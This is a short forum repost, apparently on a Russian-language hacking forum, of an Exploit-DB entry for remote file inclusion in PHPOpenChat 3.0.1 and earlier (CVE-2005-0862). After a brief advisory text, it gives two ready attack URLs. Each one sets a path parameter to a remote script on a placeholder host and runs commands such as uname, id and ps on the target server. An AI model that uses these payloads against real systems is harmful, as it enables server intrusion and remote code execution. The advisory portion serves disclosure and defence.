Exploit PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
25228
Проверка EDB
  1. Пройдено
Автор
ALBANIA SECURITY CLAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-0862
Дата публикации
2005-03-15
Код:
source: https://www.securityfocus.com/bid/12817/info
 
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
 
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
 
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. 

http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps

http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
 
Источник
www.exploit-db.com

Похожие темы